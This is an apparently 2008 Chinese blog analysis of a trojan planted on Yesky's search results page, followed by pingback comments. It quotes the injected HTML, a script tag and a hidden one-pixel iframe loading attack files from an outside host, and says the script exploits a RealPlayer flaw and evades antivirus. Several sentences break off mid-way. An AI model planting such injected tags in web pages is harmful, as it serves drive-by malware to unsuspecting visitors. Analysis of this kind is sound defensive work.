http://www.yesky.com天极网为国内著名IT门户网站。
http://search.yesky.com/index.html为天极搜索主页。经过分析得知,木马页面挂在了搜索结果返回页上,假如搜索关键词没有相符的网页,会返回
该域名的命名和参数都与一直以来流行的挂马页面相似:
http://xxx.9yimeiyuan.com/xx.htm?id=017
http://xxx.hao1680.com/xx.htm?id=017
2个调用和2个统计代码:
<script language=javascript src=http://town.521town.com/wm/rl.js></script>
<iframe src=http://town.521town.com/wm/jh.htm width=100 height=1></iframe>
</body></html>
<script src=’http://s55.cnzz.com/stat.php?id=474784&web_id=474784′ language=’JavaScript’ charset=’gb2312′></script>
<script language=”javascript” type=”text/javascript” src=”http://js.users.51.la/994346.js” mce_src=”http://js.users.51.la/994346.js”></script>
http://town.521town.com/wm/rl.js为REAL漏洞,代码没有经过加密,但做过了对卡巴的免杀,目前还是过了卡巴。将SHELLCODE经过ALPHA解密以后得出地址:
Popularity: 12% [?]
知道创宇 » Blog Archive » 天极搜索被挂的木马分析 responded on 24 Feb 2008 at 5:24 am #
[…] 来源参考:http://www.scanw.com/blog/?p=5 […]
知道创宇 » Blog Archive » 天极搜索被挂的木马分析 responded on 24 Feb 2008 at 5:24 am #
[…] Just another WordPress weblog « 天极搜索被挂木马页面 天极搜索被挂的木马分析 […]
知道创宇 » Blog Archive » 天极搜索被挂木马分析 responded on 24 Feb 2008 at 5:25 am #
[…] 来源参考:http://www.scanw.com/blog/?p=5 […]